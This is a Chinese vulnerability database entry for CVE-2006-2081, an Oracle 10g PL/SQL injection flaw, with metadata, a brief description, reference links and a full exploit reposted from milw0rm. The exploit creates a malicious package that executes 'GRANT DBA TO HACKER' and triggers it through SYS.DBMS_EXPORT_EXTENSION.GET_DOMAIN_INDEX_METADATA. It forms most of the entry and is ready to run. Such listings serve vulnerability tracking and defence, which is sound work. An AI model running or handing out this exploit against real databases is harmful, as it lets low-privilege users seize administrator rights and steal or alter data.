Oracle 10g DBMS_EXPORT_EXTENSION存储过程远程SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110146 漏洞类型 SQL注入
发布时间 2006-04-26 更新时间 2006-04-28
CVE编号 CVE-2006-2081 CNNVD-ID CNNVD-200604-531
漏洞平台 Multiple CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/1719
https://cxsecurity.com/issue/WLB-2006050001
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-531
|漏洞详情
Oracle是一款大型的商业数据库系统。Oracle10g中由SYS用户运行的DBMS_EXPORT_EXTENSION存储过程存在PL/SQL注入漏洞,允许低权限用户以DBA权限执行任意SQL代码。Oracle声称已在2006年4月的紧急补丁更新中修复了这个漏洞,但实际上并未修复。
|漏洞EXP
/* 0day, description is wrong. /str0ke */

/*
* Fucking NON-0 day($) exploit for Oracle 10g 10.2.0.2.0
*
* Patch your database now!
*
* by N1V1Hd $3c41r3
*
*/

CREATE OR REPLACE
PACKAGE MYBADPACKAGE AUTHID CURRENT_USER
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER;
END;
/

CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER
IS
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO HACKER';
COMMIT;
RETURN(1);
END;

END;
/

DECLARE
INDEX_NAME VARCHAR2(200);
INDEX_SCHEMA VARCHAR2(200);
TYPE_NAME VARCHAR2(200);
TYPE_SCHEMA VARCHAR2(200);
VERSION VARCHAR2(200);
NEWBLOCK PLS_INTEGER;
GMFLAGS NUMBER;
v_Return VARCHAR2(200);
BEGIN
INDEX_NAME := 'A1'; INDEX_SCHEMA := 'HACKER';
TYPE_NAME := 'MYBADPACKAGE'; TYPE_SCHEMA := 'HACKER';
VERSION := '10.2.0.2.0'; GMFLAGS := 1;

v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA, TYPE_NAME
=> TYPE_NAME,
TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK =>
NEWBLOCK, GMFLAGS => GMFLAGS
);
END;
/

// milw0rm.com [2006-04-26]
|参考资料

来源:US-CERT
名称:VU#932124
链接:http://www.kb.cert.org/vuls/id/932124
来源:BUGTRAQ
名称:20060426RecentOracleexploitis_actually_an0daywithnopatch
链接:http://www.securityfocus.com/archive/1/archive/1/432078/100/0/threaded
来源:BUGTRAQ
名称:20060419Oracle10g10.2.0.2.0DBAexploit
链接:http://www.securityfocus.com/archive/1/archive/1/431353/100/0/threaded
来源:MISC
链接:http://www.red-database-security.com/exploits/oracle-sql-injection-oracle-dbms_export_extension.html
来源:XF
名称:oracle-dbmsexportextension-sql-injection(26048)
链接:http://xforce.iss.net/xforce/xfdb/26048
来源:BID
名称:17699
链接:http://www.securityfocus.com/bid/17699
来源:BUGTRAQ
名称:20060501RE:Oracle10g10.2.0.2.0DBAexploit
链接:http://www.securityfocus.com/archive/1/archive/1/432632/30/5250/threaded
来源:BUGTRAQ
名称:20060427Re:RecentOracleexploitis_actually_an0daywithnopatch
链接:http://www.securityfocus.com/archive/1/archive/1/432355/100/0/threaded
来源:BUGTRAQ
名称:20060427Re:RecentOracleexploitis_actually_an0daywithnopatch
链接:http://www.securityfocus.com/archive/